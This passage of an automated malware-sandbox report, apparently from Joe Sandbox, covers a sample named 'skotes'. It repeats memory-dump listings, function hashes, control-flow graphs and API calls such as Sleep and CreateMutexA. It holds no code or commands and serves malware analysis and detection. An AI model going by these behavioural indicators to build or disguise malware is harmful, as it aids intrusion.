                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 6f859f9652482fbc6929c291dfa39b5d1d26478b8011320faf9d91b4c8ccbe47
                                                                                                                                                                                                                                • Instruction ID: 9ed035d883eb45ac802d0ce28a54950edf36355f9054645b38c5f2aa8b40bde3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f859f9652482fbc6929c291dfa39b5d1d26478b8011320faf9d91b4c8ccbe47
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3314071610208CBEB18EBFCDC89BBDB773EB85314F248259E518D73D5C77959808652

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 238 6f9adc-6f9ae8 239 6f9afe-6f9d91 call 70d663 call 707a00 call 6f5c10 call 6f8b30 call 708220 call 707a00 call 6f5c10 call 6f8b30 call 708220 238->239 240 6f9aea-6f9af8 238->240 240->239 241 6fa917 240->241 243 6fa953-6fa994 Sleep CreateMutexA 241->243 244 6fa917 call 726c6a 241->244 249 6fa9a7-6fa9a8 243->249 250 6fa996-6fa998 243->250 244->243 250->249 252 6fa99a-6fa9a5 250->252 252->249
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: a4eb34835a9c2639dc4edb8961b79b2dd141d6f62be1d349965669f740cc91b1
                                                                                                                                                                                                                                • Instruction ID: 4066ab7c8760c8121692bdcf4ca0f2573bef63e4634e7e0099d2d187319f2c78
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4eb34835a9c2639dc4edb8961b79b2dd141d6f62be1d349965669f740cc91b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A213D71A14204DBEB18ABACEC897BDF763EBC1314F104269E518C73D5C7B959808611

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 306 6fa856-6fa86e 307 6fa89c-6fa89e 306->307 308 6fa870-6fa87c 306->308 311 6fa8a9-6fa8b1 call 6f7d30 307->311 312 6fa8a0-6fa8a7 307->312 309 6fa87e-6fa88c 308->309 310 6fa892-6fa899 call 70d663 308->310 309->310 313 6fa94e 309->313 310->307 323 6fa8e4-6fa8e6 311->323 324 6fa8b3-6fa8bb call 6f7d30 311->324 315 6fa8eb-6fa916 call 7080c0 312->315 317 6fa953-6fa987 Sleep CreateMutexA 313->317 318 6fa94e call 726c6a 313->318 325 6fa98e-6fa994 317->325 318->317 323->315 324->323 330 6fa8bd-6fa8c5 call 6f7d30 324->330 328 6fa9a7-6fa9a8 325->328 329 6fa996-6fa998 325->329 329->328 331 6fa99a-6fa9a5 329->331 330->323 335 6fa8c7-6fa8cf call 6f7d30 330->335 331->328 335->323 338 6fa8d1-6fa8d9 call 6f7d30 335->338 338->323 341 6fa8db-6fa8e2 338->341 341->315
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: ec1f7670c1cf13c06ea0aa5033e995658c538648827e837cf9f653f731e48bbb
                                                                                                                                                                                                                                • Instruction ID: e41368c251dbb0f7bbd6279a1b3451ebdca7ec9705db680403df75721145d682
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec1f7670c1cf13c06ea0aa5033e995658c538648827e837cf9f653f731e48bbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03216AB164520DDAFB6467F8988B7BEB2639F81340F24481AE71CD73D1CBFA58818153

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 283 6fa34f-6fa35b 284 6fa35d-6fa36b 283->284 285 6fa371-6fa39a call 70d663 283->285 284->285 286 6fa93a 284->286 291 6fa39c-6fa3a8 285->291 292 6fa3c8-6fa916 call 7080c0 285->292 289 6fa953-6fa994 Sleep CreateMutexA 286->289 290 6fa93a call 726c6a 286->290 297 6fa9a7-6fa9a8 289->297 298 6fa996-6fa998 289->298 290->289 294 6fa3be-6fa3c5 call 70d663 291->294 295 6fa3aa-6fa3b8 291->295 294->292 295->286 295->294 298->297 301 6fa99a-6fa9a5 298->301 301->297
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: e5079d7c613b67464bcc27c298592fe86cd2e21189ee70ea6ca9f8cb571b81fb
                                                                                                                                                                                                                                • Instruction ID: 6ef2dc1be26bfc8654643066fa6961dacf9a5958da9f974019be64033bba4e8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5079d7c613b67464bcc27c298592fe86cd2e21189ee70ea6ca9f8cb571b81fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD216D72614208DBE7189BACDC857BDB763DBD1311F20426AE51CD77D1C7B955808212
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
